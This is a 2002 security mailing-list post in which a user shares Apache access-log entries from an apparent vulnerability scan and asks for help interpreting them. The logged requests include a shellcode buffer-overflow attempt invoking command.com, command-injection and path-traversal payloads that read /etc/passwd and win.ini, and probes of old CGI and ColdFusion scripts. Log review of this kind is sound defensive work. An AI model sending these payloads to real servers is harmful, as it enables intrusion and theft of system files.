Hello all,

I am new to the list and have gained a ton from reading all the comments and
suggestions. I thought someone might be able to help me out and give me their
two cents on something I noticed in my Apache access logs.Looks like a buffer
overflow intended for a NT machine.

0.70.24.222 - - [10/Jul/2002:01:05:44 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /IAmAScaryCyberCop.SNI" 404
-
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
http://10.144.192.54/cfdocs/expeval/openfile.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
-+-+-+-+h^X%FF%E6%FF%D4%83%C62j%01V%8A%06<_u%03%80.?FAI%84%C0u%F0%BAto|_%B9t`}`%03%CA%FF%D1%BAX_|_%B9XP|`%03%CA%FF%D1c:\command.com_
/c_copy_\WebSite\readme.1st_\WebSite\htdocs\cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
http://10.144.192.54/cfdocs/expeval/displayopenedfile.cfm HTTP/1.0" 404 311
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET /cybercop.htm" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
http://10.144.192.54/cfdocs/expeval/exprcalc.cfm HTTP/1.0" 404 302
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "HEAD / HTTP/1.0" 200 0
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET //etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:09 -0500] "GET
/cgi-bin/faxsurvey?cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/faxsurvey?cat%20/etc/passwd HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/campas?%0acat%0a/etc/passwd%0a" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/info2www?(../../../../../../../../sbin/ping-c%d%s|)" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/pfdispaly?../../../../../etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/cgi-bin/webdist.cgi?distloc=;cat%20/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "get /" 501 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/MachineInfo" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /IAmAScaryCyberCop.SNI" 404
-
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/scripts/tools/newdsn.exe?driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=NA
I+Test&dbq=..%2fwwwroot%2fNAI-18719.htm&newdb=CREATE_DB&attr= HTTP/1.0" 404
299
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /ASPSamp/ HTTP/1.0" 404 283
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET /cgi-bin/Count.cgi?dd=aa
HTTP/1.0" 404 292
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET
/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:10 -0500] "GET / HTTP/1.0" 200 1350
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET
/mlog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "GET
/php/mylog.phtml?screen=/etc/passwd" 404 -
10.70.24.222 - - [10/Jul/2002:01:06:11 -0500] "POST
/cgi-win/uploader.exe/cgi-win/ HTTP/1.0" 404 304

I haven't seen any of the code for the latest apache chunk exploit. Anyone
have any ideas or suggestions?

Thanks!

-Charles

-- 
To unsubscribe, e-mail: suse-security-unsubscribesuse.com
For additional commands, e-mail: suse-security-helpsuse.com
Security-related bug reports go to securitysuse.de, not here

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]